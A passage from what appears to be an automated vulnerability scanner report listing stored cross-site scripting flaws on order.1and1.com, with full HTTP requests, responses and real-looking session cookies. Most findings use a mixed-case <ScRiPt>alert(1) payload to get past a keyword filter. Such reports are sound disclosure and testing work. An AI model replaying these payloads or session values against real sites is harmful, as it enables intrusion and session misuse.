Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:38:33 GMT; Path=/
ETag: c7593eca9d95d112a774e3b42a8bf63f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24356


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="DomaininfoMove";UNOUNO.params.lastpage="DomaininfoMoved1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:48:28 GMT; Path=/
ETag: 425493d0f8ed0f19e7a04c07ddd3cc38
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Eshops";UNOUNO.params.lastpage="Eshopsf145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:00 GMT; Path=/
ETag: 53f791f92af4dbedadc8055ee2452240
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17973


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureDatabaseDatabase";UNOUNO.params.lastpage="FeatureDatabaseDatabase9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=obmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:55:37 GMT; Path=/
ETag: 242b6a1e5eeabc95b2abaab00ee5cf77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19175


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailEmail";UNOUNO.params.lastpage="FeatureEmailEmailf6a45</ScRiPt >ca9d9974f55";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:56:00 GMT; Path=/
ETag: 3a27e5470d1c0301a5f75b92d0fc9df4
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16817


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailWebmail";UNOUNO.params.lastpage="FeatureEmailWebmail45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
